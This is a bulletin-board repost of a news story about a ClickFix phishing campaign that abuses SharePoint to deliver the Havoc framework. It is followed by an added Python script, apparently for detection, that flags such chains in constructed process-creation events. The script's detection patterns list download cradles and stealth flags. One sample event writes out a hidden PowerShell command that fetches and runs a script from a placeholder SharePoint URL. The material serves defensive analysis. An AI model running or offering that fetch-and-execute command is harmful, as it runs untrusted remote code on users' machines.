• MS SharePoint hijacked to

    From Mike Powell@1:2320/105 to All on Tuesday, March 04, 2025 19:05:00
    Microsoft SharePoint hijacked to spread Havoc malware

    Date:
    Tue, 04 Mar 2025 14:23:00 +0000

    Description:
    Fake OneDrive errors are being used in brand new malware campaign

    FULL STORY ======================================================================
    - Security researchers spotted a new ClickFix campaign
    - The goal is to deploy the Havoc post-exploitation framework
    - The framework is hosted on a Microsoft SharePoint account

    Hackers have been seen abusing Microsoft SharePoint to distribute the Havoc post-exploitation framework in a new ClickFix phishing attack.

    Cybersecurity researchers at Fortiguard Labs, who have been tracking the
    campaign since last year, highlighted how ClickFix is a type of scam we've
    probably all encountered at least once. Cybercriminals hijack a website and
    create an overlay that displays a fake error message (for example: "Your
    browser is outdated; to view the contents of the webpage, you need to update
    it"). That fake message prompts the victim into action, which usually ends
    with the victim downloading and running malware, or sharing sensitive
    information such as passwords or banking data.

    This campaign is similar, although it requires a bit more activity from the
    victim's side. The attack chain starts with a phishing email carrying a
    "restricted notice" as an .HTML attachment. Opening the attachment displays a
    fake error that says "Failed to connect to OneDrive - update the DNS cache
    manually." The page also has a "How to fix" button that copies a PowerShell
    command to the Windows clipboard and then displays instructions on how to
    paste and run it. The attachment itself carries no exploit: the victim pastes
    and executes the command by hand.

    Rising threat of ClickFix

    Running that command fetches and runs a second script, hosted on the
    attacker-controlled SharePoint account, which in turn downloads a Python
    script that deploys the Havoc post-exploitation framework as a .DLL file.

    Havoc is a post-exploitation framework designed for advanced red teaming and adversary simulation, providing modular capabilities for stealthy command and control (C2) operations. It offers features like in-memory execution,
    encrypted communication, and evasion techniques to bypass modern security defenses.

    ClickFix has become extremely popular over the last couple of months. In late
    October last year, a new malware variant was observed compromising thousands
    of WordPress websites, installing a malicious plugin that would serve the
    ClickFix attack.

    Just a few weeks earlier, researchers saw fake "broken" Google Meet call
    pages, which were also a variant of the ClickFix attack.

    Via BleepingComputer

    ======================================================================
    Link to news story: https://www.techradar.com/pro/security/microsoft-sharepoint-hijacked-to-spread-havoc-malware

    $$
    --- SBBSecho 3.20-Linux
    * Origin: capitolcityonline.net * Telnet/SSH:2022/HTTP (1:2320/105)
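The attack chain in the story above (a PowerShell command pasted by the victim, a second stage hosted on SharePoint, a Python loader that drops the Havoc DLL) is what a detection engineer would want to match on. The following Python is an added example, not code from the TechRadar article, Fortiguard Labs or BleepingComputer. It runs simple ClickFix-chain logic over constructed process-creation events in the shape of Sysmon Event ID 1 (every PID, path, user and the SharePoint URL is made up), flagging a shell started by explorer.exe with a download cradle or stealth flags, a next stage pulled from a sharepoint.com host, and a Python interpreter spawned by that shell from a user-writable path. The field names, thresholds and reason strings are this example's own assumptions.

```python
"""ClickFix-style chain detection over constructed process-creation events.

Added example (not the article's or any vendor's code). Events mimic the
fields of Sysmon Event ID 1; all sample data below is constructed.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Minimal process-creation record (the fields Sysmon Event ID 1 carries)."""
    pid: int
    parent_pid: int
    image: str          # full path of the new process
    parent_image: str   # full path of the parent process
    command_line: str


SHELLS = {"powershell.exe", "pwsh.exe"}
PYTHON = {"python.exe", "pythonw.exe"}

# Download-and-execute primitives that pasted ClickFix one-liners lean on.
CRADLE = re.compile(
    r"(?i)\b(iwr|invoke-webrequest|irm|invoke-restmethod|iex|invoke-expression|"
    r"downloadstring|downloadfile|start-bitstransfer|curl|wget)\b")
# Flags that hide the console, bypass policy, or carry a base64 payload;
# rarely typed by a real user into a Run box or console.
STEALTH = re.compile(
    r"(?i)(-(w|win|windowstyle)\s+hidden|-nop\b|-noprofile\b|-ep\s+bypass|"
    r"-executionpolicy\s+bypass|-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,})")
URL_HOST = re.compile(r"(?i)https?://([a-z0-9.-]+)")
USER_WRITABLE = re.compile(r"(?i)\\(temp|appdata|programdata|public|downloads)\\")


def _name(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def shell_indicators(ev: ProcEvent) -> list[str]:
    """Reasons a single shell launch looks like a pasted ClickFix command."""
    if _name(ev.image) not in SHELLS:
        return []
    reasons = []
    if _name(ev.parent_image) == "explorer.exe":
        reasons.append("shell started by explorer.exe (Run dialog or pasted into a console)")
    if CRADLE.search(ev.command_line):
        reasons.append("download cradle in command line")
    if STEALTH.search(ev.command_line):
        reasons.append("hidden-window / policy-bypass / encoded flags")
    host = URL_HOST.search(ev.command_line)
    if host and host.group(1).lower().endswith(".sharepoint.com"):
        reasons.append(f"next stage fetched from SharePoint host {host.group(1)}")
    return reasons


def find_clickfix_chains(events: list[ProcEvent], min_reasons: int = 2) -> list[dict]:
    """Correlate each shell launch with its children and return alert records.

    A Python interpreter spawned by the shell from a user-writable directory
    (the PowerShell -> Python -> DLL chain in the story) counts as one more
    reason; an alert fires once a shell accumulates ``min_reasons`` reasons.
    """
    children: dict[int, list[ProcEvent]] = {}
    for ev in events:
        children.setdefault(ev.parent_pid, []).append(ev)

    alerts = []
    for ev in events:
        if _name(ev.image) not in SHELLS:
            continue
        reasons = shell_indicators(ev)
        for child in children.get(ev.pid, []):
            if _name(child.image) in PYTHON and USER_WRITABLE.search(child.image):
                reasons.append(f"spawned Python from user-writable path: {child.image}")
        if len(reasons) >= min_reasons:
            alerts.append({"pid": ev.pid, "command_line": ev.command_line, "reasons": reasons})
    return alerts


# Constructed sample events (not real telemetry): a user opening PowerShell
# normally, an admin script run from cmd.exe, and a ClickFix-style chain.
SAMPLE_EVENTS = [
    ProcEvent(3001, 1200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\explorer.exe", "powershell.exe"),
    ProcEvent(3002, 2100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\cmd.exe", r"powershell.exe -File C:\Scripts\inventory.ps1"),
    ProcEvent(4410, 1200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\explorer.exe",
              "powershell -w hidden -nop -c \"iex (iwr "
              "'https://example-my.sharepoint.com/personal/user/Documents/fix.ps1' "
              "-UseBasicParsing)\""),
    ProcEvent(5120, 4410, r"C:\Users\alice\AppData\Local\Temp\python\pythonw.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"pythonw.exe C:\Users\alice\AppData\Local\Temp\loader.py"),
]


if __name__ == "__main__":
    for alert in find_clickfix_chains(SAMPLE_EVENTS):
        print(f"ALERT pid={alert['pid']}: {alert['command_line']}")
        for reason in alert["reasons"]:
            print(f"  - {reason}")
```

On the sample, only PID 4410 fires (five reasons); the plain PowerShell window opened from explorer.exe scores one reason and stays below the threshold. On real telemetry expect noise from developers who legitimately run Python from a temp directory, and treat the SharePoint-host match as a signal rather than a verdict, since tenant SharePoint sites also serve legitimate scripts; the explorer.exe parent check is the part worth keeping strict, because both the Run dialog and a freshly opened console report it as parent.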